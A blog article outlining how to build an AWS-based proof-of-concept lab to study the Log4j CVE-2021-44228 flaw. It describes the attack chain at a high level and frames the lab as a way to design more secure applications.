How to setup a PoC environment to study log4j vulnerability and protect your own Apps

Building a PoC for log4j vulnerability and its possible attacks is critical for your teams to study and research vulnerabilities and malware to be able to come-up with effective security controls. It would also contribute to secure by design initiative inside your organization.

  • Adam Alinsky - Digital Transformation Expert . Adam Alinsky 🦋 . Jan 10th, 2022
    8 . 0
  • Overview

    API in the Digital Age

    The Apache Log4j 2 utility is a Java-based logging utility commonly used for logging API/Web requests. On December 9th, 2021, a vulnerability (CVE-2021-44228) was reported that could allow a system running Apache Log4j 2 version 2.14.1 or below to be compromised. This article would have 3 parts:

    • Part I: log4j Vulnerability Overview & PoC
    • Part II: Possible Attacks on Data
    • Part III: Changing App Infrastructure Design to be Secure by Design

    The above could help your team (product, security, Red team, Blue team, etc.) study the log4j vulnerability and show security weaknesses within your Apps and infrastructure.

    log4j Vulnerability Overview

    Log4j vulnerability allows an attacker to deploy and run malware on the JVM running on the compromised system by exploiting log4j JNDI Lookup feature. This kind of attack is categorised and also known as Remote Code Execution (RCE). The malware would establish a connection (Reverse Shell) with the attacker Botnet Master Server, allowing the botnet master to execute commands on the compromised system. Eventually if the compromised system has access to data, the organization would end-up with a data breach or ransomware infection.

    API in the Digital Age

    Proof of Concept (PoC) Environment

    The PoC environments would be built on AWS using CloudFormation as this is the easiest and safest way to deploy a real environment away from your current controlled environment where you can study and research vulnerabilities and malware to be able to come-up with effective controls. In this PoC, I have built 2 totally separate environments:

  • 1
  • Your Network Infrastructure: Where an App API is deployed with log4j vulnerability. In this PoC we have chosen to use an identity REST api that connects to openLDAP to authenticate users and issue JWT token on successful authentication.
  • 2
  • Attacker Network Infrastructure: Where the attack (Planting the malware in a multi-step process) would take place.
    API in the Digital Age

    To build the stack above in AWS, please follow the readme file on Github Log4jShellPoC Repo

    App API Machine Software Stack

    Digital Transformation: App API Machine Software Stack

    The vulnerable App REST API is an API that authenticates users and upon successful authentication, it generates a token (JWT) and sends it back to be used to securely identify and authorize users in the su-sequent REST API calls. and As you can see from the illustration above, the software stack for the vulnerable App REST API is composed of the REST API itself (App API) running on JVM and authenticate users against OpenLDAP.

    OpenLDAP is where all the registered customers data exist. Data are PII (Personal Identifiable Information) and it would be very attractive prize for any intruder to who manages to get unauthorised untracked access to it.

    As mentioned before in the Part II of this article, we would be going through the possible attacks on this kind of data and explore how you can circumvent controls in-place to extract and transmit the data out of the system.

    Quick Demo Video

    In Part II of this article, I would go through more details about the possible attacks on data.

    Conclusion & Takeaways

    Building a PoC for log4j vulnerability and its possible attacks is critical for your teams to study and research vulnerabilities and malware to be able to come-up with effective security controls. It would also contribute to secure by design initiative inside your organization.

    Notice of Non-Affiliation and Disclaimer: The author of the article is not affiliated, associated, authorized, endorsed by, or in any way officially connected with any of the product vendors (Amazon AWS, etc.) mentioned in this article, or any of its subsidiaries or its affiliates.


    Share Article

    Share article with others on your favourite social media network

    About the Author

    Adam Alinsky - Digital Transformation Expert

    Adam Alinsky 🦋

    Adam is an End-2-End Solution Architect & Digital Transformation (DX) Expert across several verticals. He has more than 20 years of experience in design, development, and integration of end-2-end robust solutions with particular attention to security (APIs & Apps), high performance, scalability and high availability.

    All author posts

    Related Posts